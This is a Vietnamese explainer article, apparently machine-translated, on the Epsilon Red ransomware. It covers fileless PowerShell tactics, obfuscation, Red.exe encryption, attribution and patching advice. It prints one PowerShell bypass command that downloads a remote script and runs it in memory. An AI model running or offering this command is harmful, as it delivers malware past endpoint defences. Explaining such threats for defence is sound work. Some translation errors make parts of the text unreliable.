26/09/2022

Epsilon Red Ransomware là gì?

Epsilon Red Ransomware là gì?

Bạn đã vá các máy chủ của mình chưa?

Một mối đe dọa ransomware mới, được gọi là Epsilon Red, nhắm vào các máy chủ dựa trên Microsoft chưa được vá trong các trung tâm dữ liệu doanh nghiệp. Được đặt theo tên một nhân vật phản diện ít được biết đến trong truyện tranh Marvel, Epsilon Red gần đây đã được phát hiện bởi một công ty an ninh mạng có tên Sophos. Kể từ khi được phát hiện, ransomware đã tấn công hàng loạt tổ chức trên thế giới.

PowerShell “ẩn” ransomware không lọc

Phần mềm tống tiền không lọc là một dạng phần mềm độc hại thực thi bằng phần mềm hợp pháp đi kèm. Phần mềm độc hại không lọc dựa trên PowerShell sử dụng khả năng của PowerShell để tải trực tiếp vào bộ nhớ của thiết bị. Tính năng này giúp bảo vệ phần mềm độc hại trong tập lệnh PowerShell khỏi bị phát hiện.

Trong một tình huống điển hình, khi một tập lệnh thực thi, trước tiên nó phải được ghi vào ổ đĩa của thiết bị. Điều này cho phép các giải pháp bảo mật điểm cuối phát hiện các tập lệnh. Vì PowerShell bị loại trừ khỏi các quy trình thực thi tập lệnh tiêu chuẩn, nên nó có thể bỏ qua bảo mật điểm cuối. Ngoài ra, việc sử dụng tham số bỏ qua trong tập lệnh PowerShell cho phép kẻ tấn công phá vỡ các hạn chế của tập lệnh mạng.

Ví dụ về các tham số bỏ qua PowerShell là:

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient) .DownloadString (‘url’))

Như bạn có thể thấy, việc thiết kế các tham số bỏ qua PowerShell tương đối dễ dàng.

Đáp lại điều này, Microsoft đã phát hành một bản vá để giải quyết lỗ hổng thực thi phần mềm độc hại từ xa liên quan đến PowerShell. Tuy nhiên, các bản vá chỉ hiệu quả khi chúng được sử dụng. Nhiều tổ chức đã nới lỏng các tiêu chuẩn vá lỗi của họ, làm cho môi trường của họ dễ bị tấn công. Thiết kế của Epsilon Red là tận dụng mức độ dễ bị tổn thương đó.

See also  Cốc Cốc - Tải Cốc Cốc

Tính hữu dụng kép của Epsilon Red

Vì Epsilon Red có hiệu quả nhất đối với các máy chủ chưa được vá lỗi của Microsoft, nên phần mềm độc hại này có thể được sử dụng như một công cụ nhận thức và ransomware. Việc Epsilon có thành công hay không trong một môi trường cung cấp cho kẻ tấn công cái nhìn sâu sắc hơn về khả năng bảo mật của mục tiêu.

Nếu Epsilon thành công trong việc truy cập Microsoft Exchange Server, điều đó cho thấy rằng tổ chức đang không tuân theo các phương pháp hay nhất về bảo mật vá lỗi phổ biến. Đối với kẻ tấn công, điều này cho thấy phần còn lại của môi trường của mục tiêu có thể bị Epsilon xâm nhập dễ dàng như thế nào.

Epsilon Red sử dụng kỹ thuật Obfuscation để ẩn tải trọng của nó. Sự xáo trộn làm cho mã không thể đọc được và được sử dụng trong phần mềm độc hại PowerShell để tránh khả năng đọc cao của các tập lệnh PowerShell. Với tính năng xáo trộn, các lệnh ghép ngắn bí danh PowerShell được sử dụng để gây khó khăn cho phần mềm chống vi-rút trong việc xác định các tập lệnh độc hại trong nhật ký PowerShell.

Epsilon Red hoạt động tốt nhất với các máy chủ Microsoft chưa được vá lỗiEpsilon Red hoạt động tốt nhất với các máy chủ Microsoft chưa được vá lỗi

Tuy nhiên, vẫn có thể xác định được các tập lệnh PowerShell bị xáo trộn. Một dấu hiệu phổ biến của một cuộc tấn công PowerShell Script sắp xảy ra là việc tạo ra một đối tượng WebClient. Kẻ tấn công sẽ tạo một đối tượng WebClient trong mã PowerShell để thiết lập kết nối bên ngoài tới một URL từ xa có chứa mã độc hại.

Nếu một tổ chức bị tấn công, rất khó có khả năng tổ chức đó có đủ các biện pháp bảo mật để phát hiện các tập lệnh PowerShell bị xáo trộn. Ngược lại, nếu Epsilon Red không xâm nhập được vào máy chủ, điều này cho kẻ tấn công biết rằng mạng của mục tiêu có thể giải mã phần mềm độc hại PowerShell một cách nhanh chóng, làm cho cuộc tấn công ít có giá trị hơn. có giá trị hơn.

See also  Sự khác biệt giữa HDMI, Mini HDMI và Micro HDMI

Cuộc xâm lược mạng của Epsilon Red

Chức năng của Epsilon Red rất đơn giản. Phần mềm sử dụng một loạt các tập lệnh Powershell để xâm nhập vào các máy chủ. Các tập lệnh PowerShell này được đánh số từ 1.ps1 đến 12.ps1. Thiết kế của mỗi tập lệnh PowerShell là chuẩn bị một máy chủ đích cho tải trọng cuối cùng.

Tất cả các tập lệnh PowerShell trong Epsilon Red đều có mục đích. Một trong những tập lệnh PowerShell trong Epsilon Red được thiết kế để giải quyết các quy tắc tường lửa mạng của mục tiêu. Một phần mềm khác trong loạt bài này được thiết kế để gỡ cài đặt phần mềm chống vi-rút của mục tiêu.

Như bạn có thể đoán, các tập lệnh này hoạt động đồng bộ để đảm bảo rằng một khi tải trọng được phân phối, mục tiêu sẽ không thể nhanh chóng dừng tiến trình của nó.

Truyền tải trọng

Khi các tập lệnh PowerShell của Epsilon đã mở đường cho tải trọng cuối cùng của nó, nó sẽ được phân phối dưới dạng một phần mở rộng, Red.exe. Khi xâm nhập vào máy chủ, Red.exe sẽ quét các tệp của máy chủ và tạo danh sách các đường dẫn thư mục cho mỗi tệp mà nó phát hiện. Sau khi tạo danh sách, các tiến trình con được tạo từ tệp phần mềm độc hại chính cho mỗi đường dẫn thư mục trong danh sách. Sau đó, mỗi tệp con ransomware mã hóa một đường dẫn thư mục từ tệp danh sách.

See also  Người lạ có thể mở khóa điện thoại của bạn bằng Face ID không? Làm thế nào để ngăn chặn điều này?

Sau khi tất cả các đường dẫn thư mục trong danh sách của Epson đã được mã hóa, một tệp .txt sẽ được để lại để thông báo cho mục tiêu và nêu yêu cầu của kẻ tấn công. Ngoài ra, tất cả các nút mạng có thể truy cập được kết nối với máy chủ bị xâm nhập sau đó sẽ bị xâm nhập và khả năng phần mềm độc hại xâm nhập vào mạng có thể tăng lên.

Ai đứng sau Epsilon Red?

Hiện vẫn chưa rõ danh tính của những kẻ tấn công đằng sau Epsilon RedHiện vẫn chưa rõ danh tính của những kẻ tấn công đằng sau Epsilon Red

Hiện vẫn chưa rõ danh tính của những kẻ tấn công đằng sau Epsilon Red. Tuy nhiên, một số manh mối cho thấy nguồn gốc của những kẻ tấn công. Manh mối đầu tiên là tên của phần mềm độc hại. Epsilon Red là một nhân vật phản diện X-Men với câu chuyện có nguồn gốc từ Nga.

Manh mối thứ hai là trong ghi chú đòi tiền chuộc cho tệp .txt mà đoạn mã để lại. Nó tương tự như ghi chú do một băng đảng ransomware có tên là REvil để lại. Tuy nhiên, sự giống nhau này không chỉ ra rằng những kẻ tấn công từng là thành viên của băng nhóm này. REvil vận hành một hoạt động RaaS (Ransomware dưới dạng dịch vụ), trong đó các chi nhánh trả tiền cho REvil để truy cập vào phần mềm độc hại của nó.

Bảo vệ bạn khỏi Epsilon Red

Cho đến nay, Epsilon Red đã xâm nhập thành công các máy chủ chưa được vá lỗi. Điều này có nghĩa là một trong những cách bảo vệ tốt nhất chống lại Epsilon Red và phần mềm độc hại ransomware tương tự, là đảm bảo rằng môi trường của bạn được quản lý đúng cách. Ngoài ra, có một giải pháp bảo mật có thể nhanh chóng giải mã các tập lệnh PowerShell sẽ là một bổ sung hữu ích cho môi trường của bạn.